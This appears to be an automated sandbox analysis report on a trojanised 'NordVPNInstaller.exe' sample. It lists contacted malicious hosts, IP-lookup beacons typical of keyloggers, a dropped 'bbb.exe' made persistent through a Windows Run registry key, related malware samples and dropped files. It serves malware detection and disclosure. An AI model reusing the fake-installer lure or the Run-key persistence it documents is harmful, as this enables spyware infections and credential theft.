https://plantain-elk-b8pt.squarespacdJZ	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdr	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd2C	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd&:	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdv	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd&;	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdRg	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd&.	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdj	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespac	NordVPNInstaller.exe, 00000000.00000002.2765864520.000000000371D000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd.9	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdn	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdZh	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdb	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdVW	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdJM	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdf	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdvz	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd.3	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd:A	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdZ	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://plantain-elk-b8pt.squarespacdn&	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd&_	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd.k	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd~;	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdR	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://plantain-elk-b8pt.squarespacdBu	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdV	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://plantain-elk-b8pt.squarespacd2g	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.live.c	NordVPNInstaller.exe, 00000000.00000002.2778376127.0000000005B60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd.V	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdJ	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://plantain-elk-b8pt.squarespacdJs	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.7.dr	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	bbb.exe, 00000005.00000002.2132252567.00000000032BA000.00000004.00000800.00020000.00000000.sdmp, bbb.exe, 00000005.00000002.2132252567.0000000003280000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://plantain-elk-b8pt.squarespacdN	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://plantain-elk-b8pt.squarespacd6d	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdB	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://checkip.dyndns.org/E	NordVPNInstaller.exe, bbb.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://no-ip.com	NordVPNInstaller.exe, bbb.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdF	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://plantain-elk-b8pt.squarespacdJn	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdFm	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd:	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp, NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000036F1000.00000004.00000800.00020000.00000000.sdmp, NordVPNInstaller.exe, 00000000.00000002.2765864520.0000000003721000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdnI	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd2	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdb3	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd6	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespace.com$	NordVPNInstaller.exe, 00000000.00000002.2765864520.0000000003020000.00000004.00000800.00020000.00000000.sdmp, NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp, NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000036F1000.00000004.00000800.00020000.00000000.sdmp, NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032CF000.00000004.00000800.00020000.00000000.sdmp, NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032D7000.00000004.00000800.00020000.00000000.sdmp, bbb.exe, 00000004.00000002.3078215363.0000000003394000.00000004.00000800.00020000.00000000.sdmp, bbb.exe, 00000004.00000002.3078215363.0000000002EAD000.00000004.00000800.00020000.00000000.sdmp, bbb.exe, 00000004.00000002.3078215363.0000000003355000.00000004.00000800.00020000.00000000.sdmp, bbb.exe, 00000004.00000002.3078215363.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdb8	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdf/	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd&r	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd.	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd.z	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdvB	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdj9	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://secure.globalsig	NordVPNInstaller.exe, 00000000.00000002.2764791326.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, bbb.exe, 00000004.00000002.3072073018.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp, bbb.exe, 00000005.00000002.2131657052.0000000001200000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd&	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp, NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdj1	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.185.159.177	plantain-elk-b8pt.squarespace.com	United States		53831	SQUARESPACEUS	true
132.226.247.73	checkip.dyndns.com	United States		16989	UTMEMUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1502485
Start date and time:	2024-09-01 21:54:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	NordVPNInstaller.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/7@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 386 Number of non-executed functions: 5
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.208.16.94
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
15:55:11	API Interceptor	466573x Sleep call for process: NordVPNInstaller.exe modified
15:55:41	API Interceptor	390100x Sleep call for process: bbb.exe modified
15:56:42	API Interceptor	1x Sleep call for process: dw20.exe modified
20:55:13	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MyOtApp C:\Users\user\AppData\Roaming\bbb\bbb.exe
20:55:22	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MyOtApp C:\Users\user\AppData\Roaming\bbb\bbb.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
198.185.159.177	http://round-puma-h6za.squarespace.com	Get hash	malicious	Unknown	Browse	round-puma-h6za.squarespace.com/
	http://scarlet-marigold-h469.squarespace.com/	Get hash	malicious	Unknown	Browse	scarlet-marigold-h469.squarespace.com/
	http://keyboard-shark-m4hp.squarespace.com	Get hash	malicious	Unknown	Browse	keyboard-shark-m4hp.squarespace.com/
	http://sawfish-tarantula-b6ce.squarespace.com	Get hash	malicious	Unknown	Browse	sawfish-tarantula-b6ce.squarespace.com/
	http://lemon-tarantula-m9jf.squarespace.com/	Get hash	malicious	Unknown	Browse	lemon-tarantula-m9jf.squarespace.com/
	http://parrotfish-haddock-afyx.squarespace.com/	Get hash	malicious	Unknown	Browse	parrotfish-haddock-afyx.squarespace.com/
	http://lemon-tarantula-m9jf.squarespace.com/	Get hash	malicious	Unknown	Browse	lemon-tarantula-m9jf.squarespace.com/
	http://pufferfish-plums-7rn7.squarespace.com/	Get hash	malicious	Unknown	Browse	pufferfish-plums-7rn7.squarespace.com/
	http://ellipsoid-bell-lasy.squarespace.com	Get hash	malicious	Unknown	Browse	ellipsoid-bell-lasy.squarespace.com/
	http://guppy-groundhog-kry7.squarespace.com/	Get hash	malicious	HTMLPhisher	Browse	guppy-groundhog-kry7.squarespace.com/
132.226.247.73	Request for Quotation No. KTC 56376.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Bukti-Transfer.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Win32.CrypterX-gen.18599.19099.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Request for Quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	RFQ for RIyadh City Water Line Diversion.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Win32.PWSX-gen.30214.14248.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	lfwhUWZlmFnGhDYPudAJ.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	vessels details.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	specification details.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Contract.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	librewolf-124.0.2-1-windows-x86_64-setup.exe	Get hash	malicious	Agent Tesla, AgentTesla, HTMLPhisher	Browse	158.101.44.242
	snake.mal.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	snake.mal.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	LEK1JCI81P.exe	Get hash	malicious	RedLine, Snake Keylogger, StormKitty, SugarDump, VIP Keylogger, XWorm	Browse	193.122.6.168
	Invoice-2238562.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	INQUIRY.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	SWIFT COPIES.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Nettably.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
plantain-elk-b8pt.squarespace.com	librewolf-124.0.2-1-windows-x86_64-setup.exe	Get hash	malicious	Agent Tesla, AgentTesla, HTMLPhisher	Browse	198.185.159.177

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SQUARESPACEUS	librewolf-124.0.2-1-windows-x86_64-setup.exe	Get hash	malicious	Agent Tesla, AgentTesla, HTMLPhisher	Browse	198.185.159.177
	WhaleInstall.exe	Get hash	malicious	Unknown	Browse	198.185.159.144
	Etisalat Summary Bill for the Month of August.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	https://rebrand.ly/340957	Get hash	malicious	Unknown	Browse	198.185.159.177
	http://round-puma-h6za.squarespace.com	Get hash	malicious	Unknown	Browse	198.185.159.177
	WebAdvisorInstall.exe	Get hash	malicious	LockBit ransomware	Browse	198.185.159.144
	F-Secure-Safe-Network-Installer.exe	Get hash	malicious	LockBit ransomware	Browse	198.185.159.144
	pkgconsole.exe	Get hash	malicious	AsyncRAT, Discord Token Stealer, MicroClip, RedLine	Browse	198.185.159.144
	bof.exe	Get hash	malicious	LockBit ransomware, PureLog Stealer, RedLine, zgRAT	Browse	198.185.159.144
	DHL_AWB#6078538091.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
UTMEMUS	http://www.tiktw.com/	Get hash	malicious	Unknown	Browse	132.226.13.89
	Invoice-2238562.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	8468281651.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	STATEMENT Aug 2024.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	df24c9ca-d50b-c720-84ed-638e99f68d75.eml	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Scanned copy payment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Request for Quotation No. KTC 56376.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Bukti-Transfer.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	FACTURA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	librewolf-124.0.2-1-windows-x86_64-setup.exe	Get hash	malicious	Agent Tesla, AgentTesla, HTMLPhisher	Browse	198.185.159.177
	LEK1JCI81P.exe	Get hash	malicious	RedLine, Snake Keylogger, StormKitty, SugarDump, VIP Keylogger, XWorm	Browse	198.185.159.177
	Invoice-2238562.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	198.185.159.177
	INQUIRY.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	198.185.159.177
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	198.185.159.177
	SWIFT COPIES.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	198.185.159.177
	Nettably.exe	Get hash	malicious	Snake Keylogger	Browse	198.185.159.177
	Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	198.185.159.177
	Offer 2024-30496.exe	Get hash	malicious	Snake Keylogger	Browse	198.185.159.177
	pagamento.exe	Get hash	malicious	Snake Keylogger	Browse	198.185.159.177

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NordVPNInstaller_d32f2326bebabb555fd0cd20d617137cdc2e5360_00000000_58333de5-1d69-400c-bfdb-2fd94689eea2\Report.wer

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.5543523252397509
Encrypted:	false
SSDEEP:	192:6JtHlRA6Ca5B9UMVBJbSGOmOFeewSFdJC498CUmZrPzuiFtZ24IO8:4llRApap0JLFoCUqzuiFtY4IO8
MD5:	665FEEE07E38D85649A1AC997BB5FE92
SHA1:	F1A92DE14E6210E7497232F0E218CDA509CA91A5
SHA-256:	00F33F4108A006E206B24EA6DD3F9F98D424ED9AFCC8F53463B50DDDA4EF9EF4
SHA-512:	079AB453F62A1CF15FB7E119B04E44A318DA109AF9C214295D4A28B5D44A3398EF91200C343683DA0CE91B1FF4266942C300C1507C6DDED604463F4ED03840B9
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.6.9.4.1.8.3.1.1.7.3.5.9.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.6.9.4.1.8.5.2.8.9.2.4.0.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.8.3.3.3.d.e.5.-.1.d.6.9.-.4.0.0.c.-.b.f.d.b.-.2.f.d.9.4.6.8.9.e.e.a.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.c.4.-.0.0.0.1.-.0.0.1.4.-.f.c.e.9.-.b.6.c.f.a.8.f.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.N.o.r.d.V.P.N.I.n.s.t.a.l.l.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.0.1.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREAAB.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	7642
Entropy (8bit):	3.6983724573168293
Encrypted:	false
SSDEEP:	192:R6l7wVeJOQ6G6Y9LSUr4pgmfNrAp1EN1f/sm:R6lXJR6G6YhSUr4pgmfN4EPfB
MD5:	A673B9657D58D4EA830A8FD6AD18DEC4
SHA1:	E63EE215B0D186DC7FB852BDD2EA1766851ABD81
SHA-256:	9E22D49DFCC58DF787F83B6A5EDD8E864DB85CCB9DB8BB0D2625E970374B9AB1
SHA-512:	3D780273E62630D089EDB7B8EB8A57239F9B2509F5657F547BE8850EE63DB74D664C76E656C23EA4D7CEDA2CA7BF0E9680FC8237A4057560445D5FBCB0F7F263
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.2.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC04.tmp.xml

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4647
Entropy (8bit):	4.423013801251698
Encrypted:	false
SSDEEP:	48:cvIwWl8zsDJg77aI9snWpW8VY3vYm8M4JFKfUQTFcJFn+q8C4FvQEKcQIcQxStc2:uIjfdI7mW7VfJFKrFcLgF4EKkst3nd
MD5:	384D910585495F7F2FC83C9512C51F1A
SHA1:	ADA3031FD5573EE3C15DF505FF69132537AFDE37
SHA-256:	137D2C946F25CD0FE909D1E801CB2BCEF5B5FED01540F268B310183DAD8862C0
SHA-512:	7B29B270F20830E30EDD6A628FA863B2CE092CE6682674365B540139C12C0036908388BB311CDA57789282EE6E2C8648E8CFDBE3D14232CBD4DD2CBA6D7BABD1
Malicious:	false
Reputation:	low
